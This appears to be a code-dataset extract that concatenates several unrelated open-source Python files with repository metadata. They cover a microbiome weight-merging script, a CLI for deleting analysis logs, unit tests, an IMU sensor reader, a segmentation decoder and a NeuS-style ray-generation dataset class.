] | 242 | 2019-05-14T17:55:18.000Z | 2022-02-09T15:57:12.000Z | ipyvuetify/extra/__init__.py | guimillet/ipyvuetify | 6acd14a567e5b477b1f2baa5c92f0429b459139a | [
"MIT"
] | 172 | 2019-05-20T18:32:00.000Z | 2022-02-15T11:05:17.000Z | ipyvuetify/extra/__init__.py | guimillet/ipyvuetify | 6acd14a567e5b477b1f2baa5c92f0429b459139a | [
"MIT"
] | 44 | 2019-05-14T18:41:48.000Z | 2022-02-03T17:51:24.000Z | from .file_input import FileInput # noqa: F401
| 24 | 47 | 0.770833 |
7946521b1c3aff5788fd7caac5148ef434d2a17b | 4,456 | py | Python | bin/finalize_microbiome_entities.py | nf-core/metapep | 8229ef0d1086681e7d7094f1e794725b0e5011f9 | [
"MIT"
] | 1 | 2021-11-19T17:19:28.000Z | 2021-11-19T17:19:28.000Z | bin/finalize_microbiome_entities.py | AntoniaSchuster/metapep | a425e3c0602d5149a8a634b10b682d9f6ed924c8 | [
"MIT"
] | 34 | 2020-12-07T19:46:25.000Z | 2021-01-25T14:44:42.000Z | bin/finalize_microbiome_entities.py | skrakau/metapep | a425e3c0602d5149a8a634b10b682d9f6ed924c8 | [
"MIT"
] | 2 | 2021-08-19T08:09:36.000Z | 2021-12-13T08:45:25.000Z | #!/usr/bin/env python3
####################################################################################################
#
# Author: Leon Kuchenbecker
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
import argparse
import sys
import pandas as pd
####################################################################################################
class PartialWeightsError(RuntimeError):
pass
####################################################################################################
def parse_args():
"""Parse the command line arguments"""
parser = argparse.ArgumentParser()
parser.add_argument("-eme", "--entrez-microbiomes-entities", required=True, metavar="PATH", type=str, nargs="?", help="Microbiomes entities map from Entrez (microbiome_id, entity_name, entity_weight)")
parser.add_argument("-nme", "--nucl-microbiomes-entities", required=True, metavar="PATH", type=str, nargs="?", help="Microbiomes entities map from nucleotide methods (microbiome_id, entity_name, entity_weight)")
parser.add_argument("-menw", "--microbiomes-entities-noweights", required=True, metavar="PATH", type=str, help="Preliminary microbiome entity map (microbiome_id, entity_id) w/o weights.")
parser.add_argument("-ent", "--entities", required=True, metavar="PATH", type=str, help="Entity map (entity_id, entity_name)")
parser.add_argument("-o", "--output", required=True, metavar="PATH", type=argparse.FileType('w'), help="Output file (microbiome_id, entity_id, entity_weight)")
return parser.parse_args()
def process_weights(subset):
"""Check the integrity of the weights for a subset of the data representing
one microbiome. If all weights are present, do nothing. If no weights are
present, assign uniform weights. Otherwise, raise an error."""
if subset['entity_weight'].isnull().all():
subset['entity_weight'] = 1
elif not subset['entity_weight'].isnull().any():
pass
else:
raise PartialWeightsError(subset['microbiome_id'].iloc[0])
return subset
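
# --- Editorial example (not part of the original script, and never called by it). A
# minimal sketch of the cases handled by process_weights, using a made-up
# two-entity microbiome.
def _example_process_weights():
    no_weights = pd.DataFrame({
        "microbiome_id": [1, 1],
        "entity_id": [10, 11],
        "entity_weight": [None, None],    # no weights at all -> uniform weights of 1
    })
    print(process_weights(no_weights))

    partial_weights = pd.DataFrame({
        "microbiome_id": [2, 2],
        "entity_id": [20, 21],
        "entity_weight": [0.7, None],     # weights for only some entities -> error
    })
    try:
        process_weights(partial_weights)
    except PartialWeightsError as err:
        print(f"partial weights found for microbiome {err}")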
####################################################################################################
args = parse_args()
if not args.entrez_microbiomes_entities and not args.nucl_microbiomes_entities:
sys.exit("Neither --entrez-microbiome-entities nor --nucl-microbiome-entities were specified. Aborting.")
# Read and join the tables that provide microbiome_id, entity_id and entity_name
entity_microbiome = pd.read_csv(args.microbiomes_entities_noweights, sep='\t')
entity = pd.read_csv(args.entities, sep='\t')
entity_microbiome = entity_microbiome.merge(entity)
# Read the tables that provide the weights and concatenate them
input_data = pd.concat([ pd.read_csv(e, sep='\t') for e in [args.entrez_microbiomes_entities, args.nucl_microbiomes_entities] if e ])
# Join the weights against the entity ids table, which contains all entities
# that we have observed in upstream processes. Thus, per microbiome, we expect
# to find weights either for all of them or for none of them.
result = entity_microbiome.merge(input_data, how="left").drop(columns="entity_name")
# For each microbiome, we now check whether this assumption is true. If we find
# no weights for a microbiome, we add uniform weights.
try:
result = result.groupby("microbiome_id")\
.apply(process_weights)
result.to_csv(args.output, sep='\t', index=False, header=True)
except PartialWeightsError as e:
sys.exit(f"Inconsist weight specifications. Weights were specified for only a subset of entities in microbiome with microbiome ID {e}.")
| 51.218391 | 239 | 0.633079 |
7946526d5fb6040d4417cb9f3db4b1bd003e4142 | 398 | py | Python | ebu_tt_live/examples/__init__.py | ebu/ebu-tt-live-toolk | 8c67f83010d9fc0af5d3e270c70dce87674ad289 | [
"BSD-3-Clause"
] | 22 | 2016-01-12T10:24:27.000Z | 2022-02-17T15:40:09.000Z | ebu_tt_live/examples/__init__.py | ebu/ebu-tt-live-toolk | 8c67f83010d9fc0af5d3e270c70dce87674ad289 | [
"BSD-3-Clause"
] | 532 | 2016-04-22T13:44:11.000Z | 2021-12-21T17:39:36.000Z | ebu_tt_live/examples/__init__.py | ebu/ebu-tt-live-toolk | 8c67f83010d9fc0af5d3e270c70dce87674ad289 | [
"BSD-3-Clause"
] | 8 | 2016-04-04T12:38:30.000Z | 2019-09-05T08:01:58.000Z | from pkg_resources import ResourceManager, get_provider
def get_example_data(dataset_name):
"""
    This is a smart package loader that locates text files inside our package.

    :param dataset_name: name of the example file, relative to the ``examples/`` directory
    :return: the raw contents of the example resource
"""
provider = get_provider('ebu_tt_live')
manager = ResourceManager()
source = provider.get_resource_string(manager, 'examples/'+dataset_name)
return source
| 24.875 | 77 | 0.728643 |
794653393022035a16f39195d778530bbf680f0c | 1,969 | py | Python | trailblazer/cli/delete.py | jemten/trailblazer | dce3fe6ffd19e23c94fb6e223e4778a1c93960c9 | [
"MIT"
] | null | null | null | trailblazer/cli/delete.py | jemten/trailblazer | dce3fe6ffd19e23c94fb6e223e4778a1c93960c9 | [
"MIT"
] | null | null | null | trailblazer/cli/delete.py | jemten/trailblazer | dce3fe6ffd19e23c94fb6e223e4778a1c93960c9 | [
"MIT"
] | null | null | null | from pathlib import Path
import shutil
import click
@click.command()
@click.option('-f', '--force', is_flag=True, help='skip sanity checks')
@click.option('-y', '--yes', is_flag=True, help='skip manual confirmations')
@click.argument('analysis_id', type=int)
@click.pass_context
def delete(context, force, yes, analysis_id):
"""Delete an analysis log from the database."""
analysis_obj = context.obj['store'].analysis(analysis_id)
if analysis_obj is None:
print(click.style('analysis log not found', fg='red'))
context.abort()
print(click.style(f"{analysis_obj.family}: {analysis_obj.status}"))
if analysis_obj.is_temp:
if yes or click.confirm(f"remove analysis log?"):
analysis_obj.delete()
context.obj['store'].commit()
print(click.style(f"analysis deleted: {analysis_obj.family}", fg='blue'))
else:
if analysis_obj.is_deleted:
print(click.style(f"{analysis_obj.family}: already deleted", fg='red'))
context.abort()
if Path(analysis_obj.out_dir).exists():
root_dir = context.obj['store'].families_dir
family_dir = analysis_obj.out_dir
if not force and (len(family_dir) <= len(root_dir) or root_dir not in family_dir):
print(click.style(f"unknown analysis output dir: {analysis_obj.out_dir}", fg='red'))
print(click.style("use '--force' to override"))
context.abort()
if yes or click.confirm(f"remove analysis output: {analysis_obj.out_dir}?"):
shutil.rmtree(analysis_obj.out_dir, ignore_errors=True)
analysis_obj.is_deleted = True
context.obj['store'].commit()
print(click.style(f"analysis deleted: {analysis_obj.family}", fg='blue'))
else:
print(click.style(f"analysis output doesn't exist: {analysis_obj.out_dir}", fg='red'))
context.abort()
| 41.893617 | 100 | 0.631793 |
79465639827a1e7c5a2b4bb30a8aa456c4990488 | 867 | py | Python | tests/test_x2gray.py | samueljsluo/scikit-opt | b0676d5c659b9c2cd42a62d6099c02391cf381e6 | [
"MIT"
] | 3,178 | 2017-12-06T06:38:09.000Z | 2022-03-31T14:30:10.000Z | tests/test_x2gray.py | t3bol90/scikit-opt | 9282fcb6aadff3d4fbf16a36d2523735bbd1343b | [
"MIT"
] | 158 | 2018-01-21T02:21:29.000Z | 2022-03-19T11:12:54.000Z | tests/test_x2gray.py | t3bol90/scikit-opt | 9282fcb6aadff3d4fbf16a36d2523735bbd1343b | [
"MIT"
] | 807 | 2018-01-21T02:19:00.000Z | 2022-03-30T13:24:40.000Z | # -*- coding: utf-8 -*-
# @Time : 2019/10/15
# @Author : github.com/Agrover112 , github.com/guofei9987
import numpy as np
from sko.GA import GA
from sko.tool_kit import x2gray
import unittest
class TestX2Gray(unittest.TestCase):
def test_x2gray(self):
cases = [
[2, [-1, -1], [1, 1], 1e-7],
[5, [-10, -1, -3, -4.5, 1.5], [1, 3, 5, 7.8, 9.8], 1e-7],
[3, [0, -5, -10], [15, 10, 5], 1],
]
for n_dim, lb, ub, precision in cases:
ga = GA(func=lambda x: x, n_dim=n_dim, size_pop=200, max_iter=800, lb=lb, ub=ub, precision=precision)
value = ga.chrom2x(ga.Chrom)
chrom2 = x2gray(x=value, n_dim=n_dim, lb=lb, ub=ub, precision=precision)
            self.assertTrue(np.allclose(ga.Chrom, chrom2), msg='x2gray error')
if __name__ == '__main__':
unittest.main() | 27.967742 | 113 | 0.564014 |
7946567ba9af252e225e9b8601e6b3cb772c3dcb | 1,278 | py | Python | tests/test_converters/test_conda.py | OliverHofkens/dephell | 6303f416018910668f1635b70cd828a2fd2b2d9e | [
"MIT"
] | 1,880 | 2019-03-21T10:08:25.000Z | 2022-03-31T12:41:55.000Z | tests/test_converters/test_conda.py | rachmadaniHaryono/dephell | 0ef500c8f2d5f05244bac191b1b1383f68464cd2 | [
"MIT"
] | 356 | 2019-03-21T19:08:56.000Z | 2021-01-08T17:45:43.000Z | tests/test_converters/test_conda.py | rachmadaniHaryono/dephell | 0ef500c8f2d5f05244bac191b1b1383f68464cd2 | [
"MIT"
] | 157 | 2019-04-23T01:13:37.000Z | 2022-03-24T22:41:18.000Z | # project
from dephell.controllers import DependencyMaker
from dephell.converters.conda import CondaConverter
from dephell.models import Requirement, RootDependency
from dephell.yaml import yaml_load
def test_conda_loads():
content = '\n'.join([
'name: deeplearning',
'channels:',
'- defaults',
'- conda-forge',
'dependencies:',
'- python=3.6',
'- matplotlib=2.0.2',
'- numpy',
])
root = CondaConverter().loads(content=content)
assert str(root.name) == 'deeplearning'
assert str(root.python) == '==3.6.*'
deps = {dep.name: str(dep.constraint) for dep in root.dependencies}
assert deps == {'matplotlib': '==2.0.2', 'numpy': ''}
def test_conda_dumps_new():
root = RootDependency(raw_name='check-me')
deps = []
deps.extend(DependencyMaker.from_requirement(source=root, req='matplotlib==2.0.2'))
deps.extend(DependencyMaker.from_requirement(source=root, req='numpy'))
reqs = [Requirement(dep=dep, lock=False) for dep in deps]
content = CondaConverter().dumps(reqs=reqs, project=root)
doc = yaml_load(content)
assert doc['name'] == 'check-me'
assert doc['channels'] == ['defaults']
assert doc['dependencies'] == ['matplotlib ==2.0.2', 'numpy']
| 31.95 | 87 | 0.647105 |
794656d3899a8a212cf2f9815a114b7aa7aab897 | 5,572 | py | Python | rover/core/servers/imu/runImuOnly.py | CSUFTitanRover/TitanRover2018 | 4926d377322a37ba644d7e852faa305fb8bb9b55 | [
"Apache-2.0"
] | 16 | 2017-09-01T23:33:17.000Z | 2021-01-04T02:41:19.000Z | rover/core/servers/imu/runImuOnly.py | CSUFTitanRover/TitanRover2018 | 4926d377322a37ba644d7e852faa305fb8bb9b55 | [
"Apache-2.0"
] | 56 | 2017-08-30T01:14:46.000Z | 2021-02-28T22:18:44.000Z | rover/core/servers/imu/runImuOnly.py | CSUFTitanRover/TitanRover2018 | 4926d377322a37ba644d7e852faa305fb8bb9b55 | [
"Apache-2.0"
] | 15 | 2017-09-14T19:55:55.000Z | 2020-05-03T19:44:39.000Z | # Simple Adafruit BNO055 sensor reading example. Will print the orientation
# and calibration data every second.
#
# Copyright (c) 2015 Adafruit Industries
# Author: Tony DiCola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import logging
import sys
import subprocess
import time
import requests
#from deepstream import get, post
from Adafruit_BNO055 import BNO055
global imuData
imuData = {}
'''
try:
obj = {}
post(obj, 'imu')
except:
print("Not connected to deepstream")
'''
magneticDeclination = 11.88
# Create and configure the BNO sensor connection. Make sure only ONE of the
# below 'bno = ...' lines is uncommented:
# Raspberry Pi configuration with serial UART and RST connected to GPIO 18:
#bno = BNO055.BNO055(serial_port='/dev/ttyAMA0', rst=18)
# BeagleBone Black configuration with default I2C connection (SCL=P9_19, SDA=P9_20),
# and RST connected to pin P9_12:
bno = BNO055.BNO055(busnum=0)
confMode = True
# Enable verbose debug logging if -v is passed as a parameter.
if len(sys.argv) == 2 and sys.argv[1].lower() == '-v':
logging.basicConfig(level=logging.DEBUG)
time.sleep(1)
# Initialize the BNO055 and stop if something went wrong.
while not bno.begin():
print('Waiting for sensor...')
time.sleep(1)
def magToTrue(h):
return (h + magneticDeclination) % 360
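
# --- Editorial note: with the declination above (11.88 degrees), a raw magnetic
# heading of 355.0 degrees maps to (355.0 + 11.88) % 360 = 6.88 degrees true, e.g.
# magToTrue(355.0) -> 6.88.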
fileIn = open('calibrationData.txt','r')
data = fileIn.read().splitlines()
for i in range(len(data)):
data[i] = int(data[i])
bno.set_calibration(data)
fileIn.close()
# Print system status and self test result.
status, self_test, error = bno.get_system_status()
print('System status: {0}'.format(status))
print('Self test result (0x0F is normal): 0x{0:02X}'.format(self_test))
# Print out an error if system status is in error mode.
if status == 0x01:
print('System error: {0}'.format(error))
print('See datasheet section 4.3.59 for the meaning.')
# Print BNO055 software revision and other diagnostic data.
sw, bl, accel, mag, gyro = bno.get_revision()
print('Software version: {0}'.format(sw))
print('Bootloader version: {0}'.format(bl))
print('Accelerometer ID: 0x{0:02X}'.format(accel))
print('Magnetometer ID: 0x{0:02X}'.format(mag))
print('Gyroscope ID: 0x{0:02X}\n'.format(gyro))
print('Reading BNO055 data, press Ctrl-C to quit...')
try:
while True:
'''
if confMode == False and (sys != 3 or mag != 3):
print("Reloading calibration file...")
bno.set_calibration(data)
'''
# Read the Euler angles for heading, roll, pitch (all in degrees)
heading, roll, pitch = bno.read_euler()
# Read the calibration status, 0=uncalibrated and 3=fully calibrated
sys, gyro, accel, mag = bno.get_calibration_status()
heading = magToTrue(heading)
if sys == 3 and gyro == 3 and accel == 3 and mag == 3 and confMode:
bno.set_mode(0X0C)
confMode = False
print('Heading={0:0.2F} Roll={1:0.2F} Pitch={2:0.2F}\tSys_cal={3} Gyro_cal={4} Accel_cal={5} Mag_cal={6}'.format(
heading, roll, pitch, sys, gyro, accel, mag))
imuData = { "heading":heading, "roll":roll, "pitch":pitch, "sys":sys, "gyro":gyro, "accel":accel, "mag":mag }
payload = {"body":[{"topic": "record", "action":"write", "recordName": "rover/imu",
"data": imuData} ] }
print("Dumping to deepstream...")
try:
request = requests.post('http://192.168.1.2:4080', json=payload)
print(request.text)
except:
print("Rover Deepstream doesn't seem to be online")
# Other values you can optionally read:
# Orientation as a quaternion:
        #x,y,z,w = bno.read_quaternion()
# Sensor temperature in degrees Celsius:
#temp_c = bno.read_temp()
# Magnetometer data (in micro-Teslas):
#x,y,z = bno.read_magnetometer()
# Gyroscope data (in degrees per second):
#x,y,z = bno.read_gyroscope()
# Accelerometer data (in meters per second squared):
#x,y,z = bno.read_accelerometer()
# Linear acceleration data (i.e. acceleration from movement, not gravity--
# returned in meters per second squared):
#x,y,z = bno.read_linear_acceleration()
# Gravity acceleration data (i.e. acceleration just from gravity--returned
# in meters per second squared):
#x,y,z = bno.read_gravity()
# Sleep for a second until the next reading.
time.sleep(0.02)
except KeyboardInterrupt:
    print("Exiting...")
except Exception as err:
    print("Error: {}".format(err))
| 37.904762 | 121 | 0.671034 |
7946575ca2e666179eddb6c5ca422d177b8a510d | 2,578 | py | Python | networks/decoder.py | Kinpzz/SANet-TMM | 46188e2f4b11727e8356b91b5e1e2453826e27fe | [
"MIT"
] | 6 | 2021-05-18T03:07:26.000Z | 2022-02-19T10:59:36.000Z | networks/decoder.py | Kinpzz/SANet-TMM | 46188e2f4b11727e8356b91b5e1e2453826e27fe | [
"MIT"
] | 2 | 2021-07-09T14:06:07.000Z | 2022-01-02T01:39:58.000Z | networks/decoder.py | Kinpzz/SANet-TMM | 46188e2f4b11727e8356b91b5e1e2453826e27fe | [
"MIT"
] | 1 | 2022-02-19T10:59:43.000Z | 2022-02-19T10:59:43.000Z | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
class Decoder(nn.Module):
def __init__(self, mix_size, low_level_inplanes, num_classes, BatchNorm):
super(Decoder, self).__init__()
self.conv1 = nn.Conv2d(low_level_inplanes, 48, 1, bias=False)
self.bn1 = BatchNorm(48)
self.last_conv = nn.Sequential(nn.Conv2d(48+mix_size, 256, kernel_size=3, stride=1, padding=1, bias=False),
BatchNorm(256),
nn.ReLU(),
nn.Dropout(0.5),
nn.Conv2d(256, 256, kernel_size=3, stride=1, padding=1, bias=False),
BatchNorm(256),
nn.ReLU(),
nn.Dropout(0.1),
nn.Conv2d(256, num_classes, kernel_size=1, stride=1))
self.theta = nn.Sequential(nn.Conv2d(256, 48, 1, bias=False),
BatchNorm(48))
self.psi = nn.Conv2d(48, 1, 1, bias=True)
self.W = nn.Sequential(nn.Conv2d(48, 48, 1, 1, 0, bias=False),
BatchNorm(48))
self._init_weight()
def attention_connection(self, low_level_feat, x):
theta_x = self.theta(x)
g = F.interpolate(low_level_feat, x.shape[2:], mode='bilinear', align_corners=True)
f = F.softplus(theta_x + g) # soft relu
att = torch.sigmoid(self.psi(f))
att = F.interpolate(att, low_level_feat.shape[2:], mode='bilinear', align_corners=True)
y = att.expand_as(low_level_feat) * low_level_feat
W_y = self.W(y)
return W_y, att
def forward(self, x, low_level_feat):
low_level_feat = self.conv1(low_level_feat)
low_level_feat = self.bn1(low_level_feat)
low_level_feat, att = self.attention_connection(low_level_feat, x)
x = F.interpolate(x, size=low_level_feat.size()[2:], mode='bilinear', align_corners=True)
x = torch.cat((x, low_level_feat), dim=1)
x = self.last_conv(x)
return x
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight, mode='fan_in', nonlinearity='relu')
if m.bias is not None:
torch.nn.init.zeros_(m.bias)
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
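
# --- Editorial example (not part of the original SANet source). A minimal smoke test
# of the attention-gated skip connection, assuming mix_size=256 so that the hard-coded
# 256-channel `theta` projection matches the high-level feature map.
if __name__ == "__main__":
    decoder = Decoder(mix_size=256, low_level_inplanes=256, num_classes=1,
                      BatchNorm=nn.BatchNorm2d)
    high_level = torch.randn(2, 256, 16, 16)  # e.g. backbone output at 1/16 scale
    low_level = torch.randn(2, 256, 64, 64)   # e.g. backbone output at 1/4 scale
    out = decoder(high_level, low_level)
    print(out.shape)  # expected: torch.Size([2, 1, 64, 64])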
| 44.448276 | 115 | 0.543445 |
7946578f4f3e9148f599bb3ed0a22efd2b42c002 | 12,673 | py | Python | models/dataset.py | magis-slac/NeuS | f3ef3c089b2076ea8d73679bf37a94ef44a08939 | [
"MIT"
] | null | null | null | models/dataset.py | magis-slac/NeuS | f3ef3c089b2076ea8d73679bf37a94ef44a08939 | [
"MIT"
] | null | null | null | models/dataset.py | magis-slac/NeuS | f3ef3c089b2076ea8d73679bf37a94ef44a08939 | [
"MIT"
] | null | null | null | import torch
import torch.nn.functional as F
import cv2 as cv
import numpy as np
import os
from glob import glob
from icecream import ic
from scipy.spatial.transform import Rotation as Rot
from scipy.spatial.transform import Slerp
import pickle
import diffoptics as optics
from diffoptics import Rays
import sys
# Path to your local clone of the magis simulator
SIMULATOR_PATH = '/sdf/home/s/sgaz/Magis-simulator'
sys.path.insert(0, SIMULATOR_PATH)
from magis.main_helpers import make_scene, get_sensor_index_positions, get_positions
from magis.mirror_utils import get_views_given_fixed_mirrors_smooth
class Dataset:
def __init__(self, conf):
super(Dataset, self).__init__()
print('Load data: Begin')
self.device = torch.device('cuda')
self.conf = conf
self.dset_name = conf['dset_path']
self.calib_name = conf['calib_path']
with open(self.dset_name,'rb') as f:
in_dataset = pickle.load(f)
#with open(calib_name, 'rb') as f:
# calib_dict = pickle.load(f)
self.H, self.W = in_dataset.shape[1:3]
self.image_pixels = self.H * self.W
in_dataset = in_dataset.reshape(in_dataset.shape[0], -1, 6)
assert in_dataset.shape == (in_dataset.shape[0], self.H*self.W, 1+1+1+3)
self.in_dataset = torch.from_numpy(in_dataset)
self.n_images = len(self.in_dataset)
#Let's try to put a MAGIS scene in here
# Get mirror parameters
m = conf['m']
f = conf['f']
xm,ym,zm,mirror_radii,angles,theta,phi,foc,obj = get_views_given_fixed_mirrors_smooth(
m = m,
f = f * 100,
fn = 1.23,
sv = 24/10,
sh = 24/10,
skipmirrs=5,
extreme_view_angle = np.radians(55),
window_pos = 3.0,
fixed_radii = [.25],
num_mirrors = [500])
#assert len(angles) == self.in_dataset.shape[0]
normals = torch.zeros((len(angles), 3))
for i in range(len(theta)):
normal_angles = angles
normal = optics.vector(np.cos(normal_angles[i]),
np.cos(theta[i]) * np.sin(normal_angles[i]),
np.sin(theta[i]) * np.sin(normal_angles[i]))
normals[i] = optics.normalize_vector(normal)
mirror_parameters = normals, torch.tensor(xm / 100, dtype=torch.float), torch.tensor(ym / 100, dtype=torch.float), torch.tensor(zm / 100, dtype=torch.float), torch.tensor(mirror_radii / 100, dtype=torch.float)
# @Todo check sensor parameters
pixel_size = conf['pixel_size']
self.scene = make_scene(object_x_pos=obj/100, f=f, m=m, na=1 / 1.4, nb_mirror=None, sensor_resolution=(conf['sensor_resolution_x'],conf['sensor_resolution_y']),
sensor_pixel_size=(pixel_size, pixel_size), poisson_noise_mean=2, quantum_efficiency=0.77,
mirror_parameters=mirror_parameters)
self.continuous_positions = get_positions(self.scene)
rad = conf['rad']
trans_mat = torch.eye(4)
trans_mat[0][3] = -obj/100* 1/rad
scale_mat = torch.eye(4)
scale_mat[0][0] = 1/rad
scale_mat[1][1] = 1/rad
scale_mat[2][2] = 1/rad
full_scale_mat = torch.matmul(trans_mat, scale_mat)[:-1]
self.full_scale_mat = full_scale_mat
object_bbox_min = np.array([-1.01, -1.01, -1.01, 1.0])
object_bbox_max = np.array([ 1.01, 1.01, 1.01, 1.0])
self.object_bbox_min = object_bbox_min[:, None][:3, 0]
self.object_bbox_max = object_bbox_max[:, None][:3, 0]
print('Load data: End')
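
    # --- Editorial note: the camera-based ray generators below (gen_rays_at,
    # gen_random_rays_at, gen_rays_between) are kept from the original NeuS Dataset and
    # reference attributes (intrinsics_all_inv, pose_all, images, masks) that this
    # MAGIS variant does not set in __init__; only the *_magis ray generators further
    # below are usable with the scene constructed above.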
def gen_rays_at(self, img_idx, resolution_level=1):
"""
Generate rays at world space from one camera.
"""
l = resolution_level
tx = torch.linspace(0, self.W - 1, self.W // l)
ty = torch.linspace(0, self.H - 1, self.H // l)
pixels_x, pixels_y = torch.meshgrid(tx, ty)
p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3
p = torch.matmul(self.intrinsics_all_inv[img_idx, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3
rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # W, H, 3
rays_v = torch.matmul(self.pose_all[img_idx, None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3
rays_o = self.pose_all[img_idx, None, None, :3, 3].expand(rays_v.shape) # W, H, 3
return rays_o.transpose(0, 1), rays_v.transpose(0, 1)
def gen_random_rays_at(self, img_idx, batch_size):
"""
Generate random rays at world space from one camera.
"""
pixels_x = torch.randint(low=0, high=self.W, size=[batch_size])
pixels_y = torch.randint(low=0, high=self.H, size=[batch_size])
color = self.images[img_idx][(pixels_y, pixels_x)] # batch_size, 3
mask = self.masks[img_idx][(pixels_y, pixels_x)] # batch_size, 3
p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1).float() # batch_size, 3
p = torch.matmul(self.intrinsics_all_inv[img_idx, None, :3, :3], p[:, :, None]).squeeze() # batch_size, 3
rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # batch_size, 3
rays_v = torch.matmul(self.pose_all[img_idx, None, :3, :3], rays_v[:, :, None]).squeeze() # batch_size, 3
rays_o = self.pose_all[img_idx, None, :3, 3].expand(rays_v.shape) # batch_size, 3
return torch.cat([rays_o.cpu(), rays_v.cpu(), color, mask[:, :1]], dim=-1).cuda() # batch_size, 10
def gen_rays_between(self, idx_0, idx_1, ratio, resolution_level=1):
"""
Interpolate pose between two cameras.
"""
l = resolution_level
tx = torch.linspace(0, self.W - 1, self.W // l)
ty = torch.linspace(0, self.H - 1, self.H // l)
pixels_x, pixels_y = torch.meshgrid(tx, ty)
p = torch.stack([pixels_x, pixels_y, torch.ones_like(pixels_y)], dim=-1) # W, H, 3
p = torch.matmul(self.intrinsics_all_inv[0, None, None, :3, :3], p[:, :, :, None]).squeeze() # W, H, 3
rays_v = p / torch.linalg.norm(p, ord=2, dim=-1, keepdim=True) # W, H, 3
trans = self.pose_all[idx_0, :3, 3] * (1.0 - ratio) + self.pose_all[idx_1, :3, 3] * ratio
pose_0 = self.pose_all[idx_0].detach().cpu().numpy()
pose_1 = self.pose_all[idx_1].detach().cpu().numpy()
pose_0 = np.linalg.inv(pose_0)
pose_1 = np.linalg.inv(pose_1)
rot_0 = pose_0[:3, :3]
rot_1 = pose_1[:3, :3]
rots = Rot.from_matrix(np.stack([rot_0, rot_1]))
key_times = [0, 1]
slerp = Slerp(key_times, rots)
rot = slerp(ratio)
pose = np.diag([1.0, 1.0, 1.0, 1.0])
pose = pose.astype(np.float32)
pose[:3, :3] = rot.as_matrix()
pose[:3, 3] = ((1.0 - ratio) * pose_0 + ratio * pose_1)[:3, 3]
pose = np.linalg.inv(pose)
rot = torch.from_numpy(pose[:3, :3]).cuda()
trans = torch.from_numpy(pose[:3, 3]).cuda()
rays_v = torch.matmul(rot[None, None, :3, :3], rays_v[:, :, :, None]).squeeze() # W, H, 3
rays_o = trans[None, None, :3].expand(rays_v.shape) # W, H, 3
return rays_o.transpose(0, 1), rays_v.transpose(0, 1)
def near_far_from_sphere(self, rays_o, rays_d):
a = torch.sum(rays_d**2, dim=-1, keepdim=True)
b = 2.0 * torch.sum(rays_o * rays_d, dim=-1, keepdim=True)
mid = 0.5 * (-b) / a
near = mid - 1.0
far = mid + 1.0
return near, far
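
    # --- Editorial note: for unit-norm ray directions a = 1, and mid = -b / (2a) is
    # the ray parameter of the point closest to the origin (the unit-sphere centre
    # after the scale-matrix normalisation above), so [near, far] = [mid - 1, mid + 1]
    # brackets the unit sphere. For example, rays_o = (0, 0, -3), rays_d = (0, 0, 1)
    # gives mid = 3, near = 2, far = 4.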
def image_at(self, idx, resolution_level):
#img = cv.imread(self.images_lis[idx])
img = self.in_dataset[idx, :, -3:].reshape((self.W,self.W, 3)).numpy()*256
return (cv.resize(img, (self.W // resolution_level, self.W // resolution_level))).clip(0, 255).astype(np.uint8)
#return (cv.resize(img, (self.W // resolution_level, self.H // resolution_level))).clip(0, 255)
def gen_rays_at_magis(self, lens, mirror, data_id, mirror_id):
"""
        Generate rays in world space for all pixels of one mirror view,
        traced from the sensor through the lens and mirror.
"""
ind = torch.arange(self.H*self.W)
# Sampling rays from the sensor to the lens
origins = torch.zeros(ind.shape[0], 3, device=self.device)
origins[:, 0] = self.continuous_positions[mirror_id][0]
origins[:, 1] = self.in_dataset[data_id, ind, 1]
origins[:, 2] = self.in_dataset[data_id, ind, 2]
points_on_lens = lens.sample_points_on_lens(ind.shape[0], device=self.device)
directions = optics.batch_vector(points_on_lens[:, 0] - origins[:, 0],
points_on_lens[:, 1]*0 - origins[:, 1],
points_on_lens[:, 2]*0 - origins[:, 2])
rays_sensor_to_lens = Rays(origins, directions, device=self.device,
meta = {'target' : self.in_dataset[data_id, ind, -3:].to(self.device),
'ind' : ind})
# Intersection with lens
t1 = lens.get_ray_intersection(rays_sensor_to_lens)
mask_t1 = ~torch.isnan(t1)
ray_lens_to_mirror = lens.intersect(rays_sensor_to_lens.get_at(mask_t1), t1[mask_t1])
# Intersection with mirror
t2 = mirror.get_ray_intersection(ray_lens_to_mirror)
mask = ~torch.isnan(t2)
assert mask.shape[0] == ind[mask_t1].shape[0]
#rays_mirror_to_object = mirror.intersect(ray_lens_to_mirror.get_at(mask), t2[mask])
